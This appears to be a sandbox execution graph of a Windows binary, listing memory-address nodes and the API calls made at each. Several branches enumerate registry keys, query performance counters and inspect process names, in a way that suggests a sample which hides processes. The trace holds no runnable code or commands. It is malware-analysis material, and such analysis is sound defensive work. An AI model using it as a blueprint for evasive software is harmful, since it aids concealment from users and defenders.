                                            execution_graph 7467 2a5af361e3c LoadLibraryA GetProcAddress 7468 2a5af361e62 SleepEx 7467->7468 7469 2a5af361e6f 7467->7469 7468->7468 9055 2a5af3634b8 9056 2a5af3634e8 9055->9056 9057 2a5af3635a1 9056->9057 9058 2a5af363505 PdhGetCounterInfoW 9056->9058 9058->9057 9059 2a5af363523 GetProcessHeap HeapAlloc PdhGetCounterInfoW 9058->9059 9060 2a5af363555 StrCmpW 9059->9060 9061 2a5af36358d GetProcessHeap HeapFree 9059->9061 9060->9061 9062 2a5af36356a 9060->9062 9061->9057 9062->9061 9063 2a5af363950 12 API calls 9062->9063 9063->9062 7470 2a5af361bc4 7477 2a5af361724 GetProcessHeap HeapAlloc 7470->7477 7472 2a5af361bd3 7473 2a5af361bda SleepEx 7472->7473 7476 2a5af36159c StrCmpIW StrCmpW 7472->7476 7528 2a5af3619b0 7472->7528 7474 2a5af361724 50 API calls 7473->7474 7474->7472 7476->7472 7545 2a5af361264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7477->7545 7479 2a5af36174c 7546 2a5af361000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7479->7546 7481 2a5af361754 7547 2a5af361264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7481->7547 7483 2a5af36175d 7548 2a5af361264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7483->7548 7485 2a5af361766 7549 2a5af361264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7485->7549 7487 2a5af36176f 7550 2a5af361000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7487->7550 7489 2a5af361778 7551 2a5af361000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7489->7551 7491 2a5af361781 7552 2a5af361000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7491->7552 7493 2a5af36178a RegOpenKeyExW 7494 2a5af3617bc RegOpenKeyExW 7493->7494 7495 2a5af3619a2 7493->7495 7496 2a5af3617fb RegOpenKeyExW 7494->7496 7497 2a5af3617e5 7494->7497 7495->7472 7499 2a5af361836 RegOpenKeyExW 7496->7499 7500 2a5af36181f 7496->7500 7553 2a5af3612b8 RegQueryInfoKeyW 7497->7553 7503 2a5af36185a 7499->7503 7504 2a5af361871 RegOpenKeyExW 7499->7504 7562 2a5af36104c RegQueryInfoKeyW 7500->7562 7508 2a5af3612b8 16 API calls 7503->7508 7505 2a5af3618ac RegOpenKeyExW 7504->7505 7506 2a5af361895 7504->7506 7510 2a5af3618e7 RegOpenKeyExW 7505->7510 7511 2a5af3618d0 7505->7511 7509 2a5af3612b8 16 API calls 7506->7509 7512 2a5af361867 RegCloseKey 7508->7512 7513 2a5af3618a2 RegCloseKey 7509->7513 7515 2a5af36190b 7510->7515 7516 2a5af361922 RegOpenKeyExW 7510->7516 7514 2a5af3612b8 16 API calls 7511->7514 7512->7504 7513->7505 7517 2a5af3618dd RegCloseKey 7514->7517 7518 2a5af36104c 6 API calls 7515->7518 7519 2a5af361946 7516->7519 7520 2a5af36195d RegOpenKeyExW 7516->7520 7517->7510 7523 2a5af361918 RegCloseKey 7518->7523 7524 2a5af36104c 6 API calls 7519->7524 7521 2a5af361998 RegCloseKey 7520->7521 7522 2a5af361981 7520->7522 7521->7495 7525 2a5af36104c 6 API calls 7522->7525 7523->7516 7526 2a5af361953 RegCloseKey 7524->7526 7527 2a5af36198e RegCloseKey 7525->7527 7526->7520 7527->7521 7572 2a5af3614a0 7528->7572 7545->7479 7546->7481 7547->7483 7548->7485 7549->7487 7550->7489 7551->7491 7552->7493 7554 2a5af361486 RegCloseKey 7553->7554 7555 2a5af361323 GetProcessHeap HeapAlloc 7553->7555 7554->7496 7556 2a5af361472 GetProcessHeap HeapFree 7555->7556 7557 2a5af36134e RegEnumValueW 7555->7557 7556->7554 7559 2a5af3613a1 7557->7559 7559->7556 7559->7557 7560 2a5af36141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 7559->7560 7561 2a5af3613cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7559->7561 7567 2a5af361530 7559->7567 7560->7559 7561->7560 7563 2a5af3611b5 RegCloseKey 7562->7563 7565 2a5af3610bf 7562->7565 7563->7499 7564 2a5af3610cf RegEnumValueW 7564->7565 7565->7563 7565->7564 7566 2a5af36114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7565->7566 7566->7565 7568 2a5af36154a 7567->7568 7571 2a5af361580 7567->7571 7569 2a5af361569 StrCmpW 7568->7569 7570 2a5af361561 StrCmpIW 7568->7570 7568->7571 7569->7568 7570->7568 7571->7559 7573 2a5af3614e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 7572->7573 7574 2a5af3614c2 GetProcessHeap HeapFree 7572->7574 7574->7573 7574->7574 8299 2a5af3747c2 8300 2a5af369978 __CxxCallCatchBlock 9 API calls 8299->8300 8301 2a5af3747d5 8300->8301 8306 2a5af368ff8 __CxxCallCatchBlock 9 API calls 8301->8306 8307 2a5af374814 __CxxCallCatchBlock 8301->8307 8302 2a5af369324 _CreateFrameInfo 9 API calls 8303 2a5af374828 8302->8303 8304 2a5af369324 _CreateFrameInfo 9 API calls 8303->8304 8305 2a5af374838 8304->8305 8306->8307 8307->8302 8594 2a5af36ae42 8595 2a5af369324 _CreateFrameInfo 9 API calls 8594->8595 8598 2a5af36ae4f __CxxCallCatchBlock 8595->8598 8596 2a5af36ae93 RaiseException 8597 2a5af36aeba 8596->8597 8599 2a5af369978 __CxxCallCatchBlock 9 API calls 8597->8599 8598->8596 8604 2a5af36aec2 8599->8604 8600 2a5af36aeeb __CxxCallCatchBlock 8601 2a5af369324 _CreateFrameInfo 9 API calls 8600->8601 8602 2a5af36aefe 8601->8602 8603 2a5af369324 _CreateFrameInfo 9 API calls 8602->8603 8605 2a5af36af07 8603->8605 8604->8600 8606 2a5af368ff8 __CxxCallCatchBlock 9 API calls 8604->8606 8606->8600 7575 2a5af36ff40 7576 2a5af36ff4b 7575->7576 7584 2a5af372c24 7576->7584 7603 2a5af36c558 EnterCriticalSection 7584->7603 8607 2a5af36f440 GetProcessHeap 8308 2a5af3681c0 8309 2a5af3681c9 __scrt_acquire_startup_lock 8308->8309 8311 2a5af3681cd 8309->8311 8312 2a5af36bbb4 8309->8312 8313 2a5af36bbd4 8312->8313 8340 2a5af36bbed 8312->8340 8314 2a5af36bbdc 8313->8314 8315 2a5af36bbf2 8313->8315 8316 2a5af36d1f4 __free_lconv_mon 13 API calls 8314->8316 8317 2a5af36e864 56 API calls 8315->8317 8318 2a5af36bbe1 8316->8318 8319 2a5af36bbf7 8317->8319 8320 2a5af36d04c _invalid_parameter_noinfo 38 API calls 8318->8320 8341 2a5af36df38 GetModuleFileNameW 8319->8341 8320->8340 8327 2a5af36bc7a 8330 2a5af36b994 14 API calls 8327->8330 8328 2a5af36bc69 8329 2a5af36d1f4 __free_lconv_mon 13 API calls 8328->8329 8331 2a5af36bc6e 8329->8331 8332 2a5af36bc96 8330->8332 8333 2a5af36d2a0 __free_lconv_mon 13 API calls 8331->8333 8332->8331 8334 2a5af36bcc6 8332->8334 8335 2a5af36bcdf 8332->8335 8333->8340 8336 2a5af36d2a0 __free_lconv_mon 13 API calls 8334->8336 8337 2a5af36d2a0 __free_lconv_mon 13 API calls 8335->8337 8338 2a5af36bccf 8336->8338 8337->8331 8339 2a5af36d2a0 __free_lconv_mon 13 API calls 8338->8339 8339->8340 8340->8311 8342 2a5af36df91 8341->8342 8343 2a5af36df7d GetLastError 8341->8343 8345 2a5af36dd78 14 API calls 8342->8345 8365 2a5af36d184 8343->8365 8347 2a5af36dfbf 8345->8347 8346 2a5af36df8a 8348 2a5af368070 _invalid_parameter_noinfo 8 API calls 8346->8348 8352 2a5af36dfd0 8347->8352 8370 2a5af36f198 8347->8370 8351 2a5af36bc0e 8348->8351 8353 2a5af36b994 8351->8353 8374 2a5af36de1c 8352->8374 8355 2a5af36b9d2 8353->8355 8357 2a5af36ba38 8355->8357 8391 2a5af36ec1c 8355->8391 8356 2a5af36bb25 8359 2a5af36bb54 8356->8359 8357->8356 8358 2a5af36ec1c 14 API calls 8357->8358 8358->8357 8360 2a5af36bb6c 8359->8360 8364 2a5af36bba4 8359->8364 8361 2a5af36d220 __free_lconv_mon 13 API calls 8360->8361 8360->8364 8362 2a5af36bb9a 8361->8362 8363 2a5af36d2a0 __free_lconv_mon 13 API calls 8362->8363 8363->8364 8364->8327 8364->8328 8388 2a5af36d1d0 8365->8388 8367 2a5af36d191 __free_lconv_mon 8368 2a5af36d1f4 __free_lconv_mon 13 API calls 8367->8368 8369 2a5af36d1a1 8368->8369 8369->8346 8371 2a5af36f1a9 8370->8371 8373 2a5af36f1ca 8370->8373 8372 2a5af36ef88 9 API calls 8371->8372 8371->8373 8372->8373 8373->8352 8375 2a5af36de5b 8374->8375 8378 2a5af36de40 8374->8378 8376 2a5af36de60 8375->8376 8377 2a5af36ece8 WideCharToMultiByte 8375->8377 8376->8378 8381 2a5af36d1f4 __free_lconv_mon 13 API calls 8376->8381 8379 2a5af36deb7 8377->8379 8378->8346 8379->8376 8380 2a5af36debe GetLastError 8379->8380 8383 2a5af36dee9 8379->8383 8382 2a5af36d184 13 API calls 8380->8382 8381->8378 8384 2a5af36decb 8382->8384 8385 2a5af36ece8 WideCharToMultiByte 8383->8385 8386 2a5af36d1f4 __free_lconv_mon 13 API calls 8384->8386 8387 2a5af36df10 8385->8387 8386->8378 8387->8378 8387->8380 8389 2a5af36cb10 __free_lconv_mon 13 API calls 8388->8389 8390 2a5af36d1d9 8389->8390 8390->8367 8392 2a5af36eba8 8391->8392 8393 2a5af36dd78 14 API calls 8392->8393 8394 2a5af36ebcc 8393->8394 8394->8355 7669 2a5af36872c 7672 2a5af3690c0 7669->7672 7671 2a5af368755 7673 2a5af3690e1 7672->7673 7674 2a5af369116 7672->7674 7673->7674 7676 2a5af36c328 7673->7676 7674->7671 7677 2a5af36c335 7676->7677 7678 2a5af36c33f 7676->7678 7677->7678 7683 2a5af36c35a 7677->7683 7679 2a5af36d1f4 __free_lconv_mon 13 API calls 7678->7679 7680 2a5af36c346 7679->7680 7685 2a5af36d04c 7680->7685 7682 2a5af36c352 7682->7674 7683->7682 7684 2a5af36d1f4 __free_lconv_mon 13 API calls 7683->7684 7684->7680 7688 2a5af36cef8 7685->7688 7689 2a5af36cf23 7688->7689 7696 2a5af36cf94 7689->7696 7691 2a5af36cf4a 7694 2a5af36cf6d 7691->7694 7706 2a5af36c3e0 7691->7706 7693 2a5af36cf82 7693->7682 7694->7693 7695 2a5af36c3e0 _invalid_parameter_noinfo 17 API calls 7694->7695 7695->7693 7719 2a5af36ccc8 7696->7719 7701 2a5af36cfcf 7701->7691 7707 2a5af36c438 7706->7707 7708 2a5af36c3ef GetLastError 7706->7708 7707->7694 7709 2a5af36c404 7708->7709 7710 2a5af36cba0 _invalid_parameter_noinfo 14 API calls 7709->7710 7711 2a5af36c41e SetLastError 7710->7711 7711->7707 7712 2a5af36c441 7711->7712 7713 2a5af36c3e0 _invalid_parameter_noinfo 15 API calls 7712->7713 7714 2a5af36c467 7713->7714 7759 2a5af36ffe8 7714->7759 7720 2a5af36cce4 GetLastError 7719->7720 7721 2a5af36cd1f 7719->7721 7722 2a5af36ccf4 7720->7722 7721->7701 7725 2a5af36cd34 7721->7725 7732 2a5af36cba0 7722->7732 7726 2a5af36cd68 7725->7726 7727 2a5af36cd50 GetLastError SetLastError 7725->7727 7726->7701 7728 2a5af36d06c IsProcessorFeaturePresent 7726->7728 7727->7726 7729 2a5af36d07f 7728->7729 7737 2a5af36cd80 7729->7737 7733 2a5af36cbc8 FlsGetValue 7732->7733 7734 2a5af36cbc4 7732->7734 7733->7734 7735 2a5af36cbde SetLastError 7734->7735 7736 2a5af36c940 __free_lconv_mon 13 API calls 7734->7736 7735->7721 7736->7735 7738 2a5af36cdba _invalid_parameter_noinfo 7737->7738 7739 2a5af36cde2 RtlCaptureContext RtlLookupFunctionEntry 7738->7739 7740 2a5af36ce64 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7739->7740 7741 2a5af36ce2e RtlVirtualUnwind 7739->7741 7742 2a5af36ceb6 _invalid_parameter_noinfo 7740->7742 7741->7740 7745 2a5af368070 7742->7745 7746 2a5af368079 7745->7746 7747 2a5af368084 GetCurrentProcess TerminateProcess 7746->7747 7748 2a5af368848 IsProcessorFeaturePresent 7746->7748 7749 2a5af368860 7748->7749 7754 2a5af36891c RtlCaptureContext 7749->7754 7755 2a5af368936 RtlLookupFunctionEntry 7754->7755 7756 2a5af36894c RtlVirtualUnwind 7755->7756 7757 2a5af368873 7755->7757 7756->7755 7756->7757 7758 2a5af368814 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7757->7758 7760 2a5af36c48f 7759->7760 7761 2a5af370001 7759->7761 7763 2a5af370054 7760->7763 7761->7760 7767 2a5af370a40 7761->7767 7764 2a5af36c49f 7763->7764 7765 2a5af37006d 7763->7765 7764->7694 7765->7764 7785 2a5af36e8c4 7765->7785 7776 2a5af36cab0 7767->7776 7769 2a5af370a4f 7775 2a5af370a95 7769->7775 7784 2a5af36c558 EnterCriticalSection 7769->7784 7775->7760 7777 2a5af36cb10 __free_lconv_mon 13 API calls 7776->7777 7779 2a5af36cab9 7777->7779 7778 2a5af36cabe 7778->7769 7779->7778 7780 2a5af36cae8 FlsGetValue 7779->7780 7782 2a5af36cae4 7779->7782 7780->7782 7781 2a5af36cafe 7781->7769 7782->7781 7783 2a5af36c940 __free_lconv_mon 13 API calls 7782->7783 7783->7781 7786 2a5af36cab0 _invalid_parameter_noinfo 14 API calls 7785->7786 7787 2a5af36e8cd 7786->7787 9064 2a5af36aaac 9065 2a5af36aad9 __except_validate_context_record 9064->9065 9066 2a5af369324 _CreateFrameInfo 9 API calls 9065->9066 9067 2a5af36aade 9066->9067 9068 2a5af36ab38 9067->9068 9070 2a5af36abc6 9067->9070 9080 2a5af36ab8c 9067->9080 9069 2a5af36abb3 9068->9069 9073 2a5af36ab5a __GetCurrentState 9068->9073 9068->9080 9093 2a5af3695d0 9069->9093 9075 2a5af36abe5 9070->9075 9100 2a5af3699cc 9070->9100 9076 2a5af36acdd 9073->9076 9081 2a5af36afb8 9073->9081 9078 2a5af36ac34 9075->9078 9075->9080 9103 2a5af3699e0 9075->9103 9078->9080 9106 2a5af36a22c 9078->9106 9082 2a5af3699cc Is_bad_exception_allowed 9 API calls 9081->9082 9083 2a5af36afe7 __GetCurrentState 9082->9083 9084 2a5af369324 _CreateFrameInfo 9 API calls 9083->9084 9091 2a5af36b004 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 9084->9091 9085 2a5af36b0fb 9086 2a5af369324 _CreateFrameInfo 9 API calls 9085->9086 9087 2a5af36b100 9086->9087 9088 2a5af369324 _CreateFrameInfo 9 API calls 9087->9088 9089 2a5af36b10b __FrameHandler3::GetHandlerSearchState 9087->9089 9088->9089 9089->9080 9090 2a5af3699cc 9 API calls Is_bad_exception_allowed 9090->9091 9091->9085 9091->9089 9091->9090 9163 2a5af3699f4 9091->9163 9166 2a5af369634 9093->9166 9095 2a5af3695ef __FrameHandler3::GetHandlerSearchState 9170 2a5af369540 9095->9170 9098 2a5af36afb8 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 9099 2a5af369624 9098->9099 9099->9080 9101 2a5af369324 _CreateFrameInfo 9 API calls 9100->9101 9102 2a5af3699d5 9101->9102 9102->9075 9104 2a5af369324 _CreateFrameInfo 9 API calls 9103->9104 9105 2a5af3699e9 9104->9105 9105->9078 9174 2a5af36b144 9106->9174 9109 2a5af36a6f4 9110 2a5af36a373 9111 2a5af36a645 9110->9111 9155 2a5af36a3ab 9110->9155 9111->9109 9112 2a5af36a643 9111->9112 9227 2a5af36a6fc 9111->9227 9113 2a5af369324 _CreateFrameInfo 9 API calls 9112->9113 9115 2a5af36a687 9113->9115 9115->9109 9119 2a5af368070 _invalid_parameter_noinfo 8 API calls 9115->9119 9116 2a5af36a575 9116->9112 9120 2a5af36a592 9116->9120 9122 2a5af3699cc Is_bad_exception_allowed 9 API calls 9116->9122 9117 2a5af369324 _CreateFrameInfo 9 API calls 9118 2a5af36a2da 9117->9118 9118->9115 9123 2a5af369324 _CreateFrameInfo 9 API calls 9118->9123 9121 2a5af36a69a 9119->9121 9120->9112 9127 2a5af36a5b4 9120->9127 9220 2a5af3695a4 9120->9220 9121->9080 9122->9120 9124 2a5af36a2ea 9123->9124 9126 2a5af369324 _CreateFrameInfo 9 API calls 9124->9126 9130 2a5af36a2f3 9126->9130 9127->9112 9128 2a5af36a5ca 9127->9128 9129 2a5af36a6d7 9127->9129 9131 2a5af36a5d5 9128->9131 9134 2a5af3699cc Is_bad_exception_allowed 9 API calls 9128->9134 9132 2a5af369324 _CreateFrameInfo 9 API calls 9129->9132 9185 2a5af369a0c 9130->9185 9138 2a5af36b1dc 9 API calls 9131->9138 9135 2a5af36a6dd 9132->9135 9134->9131 9137 2a5af369324 _CreateFrameInfo 9 API calls 9135->9137 9140 2a5af36a6e6 9137->9140 9141 2a5af36a5eb 9138->9141 9139 2a5af3699e0 9 API calls 9139->9155 9143 2a5af36c2f4 14 API calls 9140->9143 9141->9112 9145 2a5af369634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9141->9145 9142 2a5af369324 _CreateFrameInfo 9 API calls 9144 2a5af36a335 9142->9144 9143->9109 9144->9110 9147 2a5af369324 _CreateFrameInfo 9 API calls 9144->9147 9146 2a5af36a605 9145->9146 9224 2a5af369838 RtlUnwindEx 9146->9224 9149 2a5af36a341 9147->9149 9150 2a5af369324 _CreateFrameInfo 9 API calls 9149->9150 9152 2a5af36a34a 9150->9152 9188 2a5af36b1dc 9152->9188 9155->9116 9155->9139 9199 2a5af36a96c 9155->9199 9213 2a5af36a158 9155->9213 9157 2a5af36a35e 9195 2a5af36b2cc 9157->9195 9159 2a5af36a6d1 9160 2a5af36c2f4 14 API calls 9159->9160 9160->9129 9161 2a5af36a366 __CxxCallCatchBlock std::bad_alloc::bad_alloc 9161->9159 9162 2a5af369178 Concurrency::cancel_current_task 2 API calls 9161->9162 9162->9159 9164 2a5af369324 _CreateFrameInfo 9 API calls 9163->9164 9165 2a5af369a02 9164->9165 9165->9091 9168 2a5af369662 __FrameHandler3::GetHandlerSearchState 9166->9168 9167 2a5af3696d4 9167->9095 9168->9167 9169 2a5af36968c RtlLookupFunctionEntry 9168->9169 9169->9168 9171 2a5af36958b 9170->9171 9172 2a5af369560 9170->9172 9171->9098 9172->9171 9173 2a5af369324 _CreateFrameInfo 9 API calls 9172->9173 9173->9172 9175 2a5af36b169 __FrameHandler3::GetHandlerSearchState 9174->9175 9176 2a5af369634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9175->9176 9177 2a5af36b17e 9176->9177 9239 2a5af369db4 9177->9239 9180 2a5af36b1b3 9182 2a5af369db4 __GetUnwindTryBlock RtlLookupFunctionEntry 9180->9182 9181 2a5af36b190 __FrameHandler3::GetHandlerSearchState 9242 2a5af369dec 9181->9242 9183 2a5af36a28e 9182->9183 9183->9109 9183->9110 9183->9117 9186 2a5af369324 _CreateFrameInfo 9 API calls 9185->9186 9187 2a5af369a1a 9186->9187 9187->9109 9187->9142 9189 2a5af36b2c3 9188->9189 9194 2a5af36b207 9188->9194 9190 2a5af36a35a 9190->9110 9190->9157 9191 2a5af3699e0 9 API calls 9191->9194 9192 2a5af3699cc Is_bad_exception_allowed 9 API calls 9192->9194 9193 2a5af36a96c 9 API calls 9193->9194 9194->9190 9194->9191 9194->9192 9194->9193 9196 2a5af36b339 9195->9196 9197 2a5af36b2e9 Is_bad_exception_allowed 9195->9197 9196->9161 9197->9196 9198 2a5af3699cc 9 API calls Is_bad_exception_allowed 9197->9198 9198->9197 9200 2a5af36aa28 9199->9200 9201 2a5af36a999 9199->9201 9200->9155 9202 2a5af3699cc Is_bad_exception_allowed 9 API calls 9201->9202 9203 2a5af36a9a2 9202->9203 9203->9200 9204 2a5af3699cc Is_bad_exception_allowed 9 API calls 9203->9204 9206 2a5af36a9bb 9203->9206 9204->9206 9205 2a5af36a9e7 9208 2a5af3699e0 9 API calls 9205->9208 9206->9200 9206->9205 9207 2a5af3699cc Is_bad_exception_allowed 9 API calls 9206->9207 9207->9205 9209 2a5af36a9fb 9208->9209 9209->9200 9210 2a5af36aa14 9209->9210 9211 2a5af3699cc Is_bad_exception_allowed 9 API calls 9209->9211 9212 2a5af3699e0 9 API calls 9210->9212 9211->9210 9212->9200 9214 2a5af369634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9213->9214 9215 2a5af36a195 9214->9215 9216 2a5af3699cc Is_bad_exception_allowed 9 API calls 9215->9216 9217 2a5af36a1cd 9216->9217 9218 2a5af369838 9 API calls 9217->9218 9219 2a5af36a211 9218->9219 9219->9155 9221 2a5af3695b8 __FrameHandler3::GetHandlerSearchState 9220->9221 9222 2a5af369540 __FrameHandler3::ExecutionInCatch 9 API calls 9221->9222 9223 2a5af3695c2 9222->9223 9223->9127 9225 2a5af368070 _invalid_parameter_noinfo 8 API calls 9224->9225 9226 2a5af369932 9225->9226 9226->9112 9228 2a5af36a735 9227->9228 9232 2a5af36a948 9227->9232 9229 2a5af369324 _CreateFrameInfo 9 API calls 9228->9229 9230 2a5af36a73a 9229->9230 9231 2a5af36a759 EncodePointer 9230->9231 9237 2a5af36a7ac 9230->9237 9233 2a5af369324 _CreateFrameInfo 9 API calls 9231->9233 9232->9112 9234 2a5af36a769 9233->9234 9234->9237 9245 2a5af3694ec 9234->9245 9236 2a5af36a158 19 API calls 9236->9237 9237->9232 9237->9236 9238 2a5af3699cc 9 API calls Is_bad_exception_allowed 9237->9238 9238->9237 9240 2a5af369634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9239->9240 9241 2a5af369dc7 9240->9241 9241->9180 9241->9181 9243 2a5af369634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9242->9243 9244 2a5af369e06 9243->9244 9244->9183 9246 2a5af369324 _CreateFrameInfo 9 API calls 9245->9246 9247 2a5af369518 9246->9247 9247->9237 8395 2a5af370fa8 8396 2a5af370fcc 8395->8396 8397 2a5af368070 _invalid_parameter_noinfo 8 API calls 8396->8397 8398 2a5af37100e 8397->8398 8608 2a5af36c828 8609 2a5af36c82d 8608->8609 8613 2a5af36c842 8608->8613 8614 2a5af36c848 8609->8614 8615 2a5af36c88a 8614->8615 8616 2a5af36c892 8614->8616 8617 2a5af36d2a0 __free_lconv_mon 13 API calls 8615->8617 8618 2a5af36d2a0 __free_lconv_mon 13 API calls 8616->8618 8617->8616 8619 2a5af36c89f 8618->8619 8620 2a5af36d2a0 __free_lconv_mon 13 API calls 8619->8620 8621 2a5af36c8ac 8620->8621 8622 2a5af36d2a0 __free_lconv_mon 13 API calls 8621->8622 8623 2a5af36c8b9 8622->8623 8624 2a5af36d2a0 __free_lconv_mon 13 API calls 8623->8624 8625 2a5af36c8c6 8624->8625 8626 2a5af36d2a0 __free_lconv_mon 13 API calls 8625->8626 8627 2a5af36c8d3 8626->8627 8628 2a5af36d2a0 __free_lconv_mon 13 API calls 8627->8628 8629 2a5af36c8e0 8628->8629 8630 2a5af36d2a0 __free_lconv_mon 13 API calls 8629->8630 8631 2a5af36c8ed 8630->8631 8632 2a5af36d2a0 __free_lconv_mon 13 API calls 8631->8632 8633 2a5af36c8fd 8632->8633 8634 2a5af36d2a0 __free_lconv_mon 13 API calls 8633->8634 8635 2a5af36c90d 8634->8635 8640 2a5af36c6f8 8635->8640 8654 2a5af36c558 EnterCriticalSection 8640->8654 8399 2a5af3633a8 8401 2a5af3633cf 8399->8401 8400 2a5af36349c 8401->8400 8402 2a5af3633ec PdhGetCounterInfoW 8401->8402 8402->8400 8403 2a5af36340e GetProcessHeap HeapAlloc PdhGetCounterInfoW 8402->8403 8404 2a5af363488 GetProcessHeap HeapFree 8403->8404 8405 2a5af363440 StrCmpW 8403->8405 8404->8400 8405->8404 8407 2a5af363455 8405->8407 8407->8404 8408 2a5af363950 StrCmpNW 8407->8408 8409 2a5af363982 StrStrW 8408->8409 8412 2a5af3639f2 8408->8412 8410 2a5af36399b StrToIntW 8409->8410 8409->8412 8411 2a5af3639c3 8410->8411 8410->8412 8411->8412 8418 2a5af361a30 OpenProcess 8411->8418 8412->8407 8419 2a5af361ab6 8418->8419 8420 2a5af361a64 K32GetModuleFileNameExW 8418->8420 8419->8412 8424 2a5af363f88 8419->8424 8421 2a5af361aad CloseHandle 8420->8421 8422 2a5af361a7e PathFindFileNameW lstrlenW 8420->8422 8421->8419 8422->8421 8423 2a5af361a9c StrCpyW 8422->8423 8423->8421 8425 2a5af363f95 StrCmpNIW 8424->8425 8426 2a5af3639e4 8424->8426 8425->8426 8426->8412 8427 2a5af361cfc 8426->8427 8428 2a5af361d1c 8427->8428 8429 2a5af361d13 8427->8429 8428->8412 8430 2a5af361530 2 API calls 8429->8430 8430->8428 7788 2a5af36bd34 7789 2a5af36bd4d 7788->7789 7799 2a5af36bd49 7788->7799 7803 2a5af36e864 7789->7803 7794 2a5af36bd6b 7829 2a5af36bda8 7794->7829 7795 2a5af36bd5f 7797 2a5af36d2a0 __free_lconv_mon 13 API calls 7795->7797 7797->7799 7800 2a5af36d2a0 __free_lconv_mon 13 API calls 7801 2a5af36bd92 7800->7801 7802 2a5af36d2a0 __free_lconv_mon 13 API calls 7801->7802 7802->7799 7804 2a5af36e871 7803->7804 7805 2a5af36bd52 7803->7805 7848 2a5af36cacc 7804->7848 7809 2a5af36edc8 GetEnvironmentStringsW 7805->7809 7807 2a5af36e8a0 7853 2a5af36e53c 7807->7853 7810 2a5af36bd57 7809->7810 7811 2a5af36edf8 7809->7811 7810->7794 7810->7795 7812 2a5af36ece8 WideCharToMultiByte 7811->7812 7813 2a5af36ee49 7812->7813 7814 2a5af36ee53 FreeEnvironmentStringsW 7813->7814 7815 2a5af36c5d0 14 API calls 7813->7815 7814->7810 7816 2a5af36ee63 7815->7816 7817 2a5af36ee6b 7816->7817 7818 2a5af36ee74 7816->7818 7819 2a5af36d2a0 __free_lconv_mon 13 API calls 7817->7819 7820 2a5af36ece8 WideCharToMultiByte 7818->7820 7821 2a5af36ee72 7819->7821 7822 2a5af36ee97 7820->7822 7821->7814 7823 2a5af36ee9b 7822->7823 7824 2a5af36eea5 7822->7824 7826 2a5af36d2a0 __free_lconv_mon 13 API calls 7823->7826 7825 2a5af36d2a0 __free_lconv_mon 13 API calls 7824->7825 7827 2a5af36eea3 FreeEnvironmentStringsW 7825->7827 7826->7827 7827->7810 7830 2a5af36bdcd 7829->7830 7831 2a5af36d220 __free_lconv_mon 13 API calls 7830->7831 7842 2a5af36be03 7831->7842 7832 2a5af36be0b 7833 2a5af36d2a0 __free_lconv_mon 13 API calls 7832->7833 7835 2a5af36bd73 7833->7835 7834 2a5af36be6d 7836 2a5af36d2a0 __free_lconv_mon 13 API calls 7834->7836 7835->7800 7836->7835 7837 2a5af36d220 __free_lconv_mon 13 API calls 7837->7842 7838 2a5af36be92 8044 2a5af36bebc 7838->8044 7840 2a5af36c328 __std_exception_copy 38 API calls 7840->7842 7842->7832 7842->7834 7842->7837 7842->7838 7842->7840 7843 2a5af36bea6 7842->7843 7845 2a5af36d2a0 __free_lconv_mon 13 API calls 7842->7845 7846 2a5af36d06c _invalid_parameter_noinfo 17 API calls 7843->7846 7844 2a5af36d2a0 __free_lconv_mon 13 API calls 7844->7832 7845->7842 7847 2a5af36beb9 7846->7847 7849 2a5af36cae8 FlsGetValue 7848->7849 7850 2a5af36cae4 7848->7850 7849->7850 7851 2a5af36c940 __free_lconv_mon 13 API calls 7850->7851 7852 2a5af36cafe 7850->7852 7851->7852 7852->7807 7876 2a5af36e7ac 7853->7876 7858 2a5af36e58e 7858->7805 7861 2a5af36e5a7 7862 2a5af36d2a0 __free_lconv_mon 13 API calls 7861->7862 7862->7858 7863 2a5af36e5b6 7863->7863 7902 2a5af36e8e0 7863->7902 7866 2a5af36e6b2 7867 2a5af36d1f4 __free_lconv_mon 13 API calls 7866->7867 7868 2a5af36e6b7 7867->7868 7870 2a5af36d2a0 __free_lconv_mon 13 API calls 7868->7870 7869 2a5af36e70d 7872 2a5af36e774 7869->7872 7913 2a5af36e05c 7869->7913 7870->7858 7871 2a5af36e6cc 7871->7869 7875 2a5af36d2a0 __free_lconv_mon 13 API calls 7871->7875 7874 2a5af36d2a0 __free_lconv_mon 13 API calls 7872->7874 7874->7858 7875->7869 7877 2a5af36e7cf 7876->7877 7882 2a5af36e7d9 7877->7882 7928 2a5af36c558 EnterCriticalSection 7877->7928 7883 2a5af36e571 7882->7883 7885 2a5af36cacc 14 API calls 7882->7885 7888 2a5af36e22c 7883->7888 7886 2a5af36e8a0 7885->7886 7887 2a5af36e53c 56 API calls 7886->7887 7887->7883 7929 2a5af36dd78 7888->7929 7891 2a5af36e24c GetOEMCP 7893 2a5af36e273 7891->7893 7892 2a5af36e25e 7892->7893 7894 2a5af36e263 GetACP 7892->7894 7893->7858 7895 2a5af36c5d0 7893->7895 7894->7893 7896 2a5af36c61b 7895->7896 7900 2a5af36c5df __free_lconv_mon 7895->7900 7897 2a5af36d1f4 __free_lconv_mon 13 API calls 7896->7897 7899 2a5af36c619 7897->7899 7898 2a5af36c602 HeapAlloc 7898->7899 7898->7900 7899->7861 7899->7863 7900->7896 7900->7898 7901 2a5af36b470 __free_lconv_mon 2 API calls 7900->7901 7901->7900 7903 2a5af36e22c 16 API calls 7902->7903 7904 2a5af36e91b 7903->7904 7906 2a5af36e958 IsValidCodePage 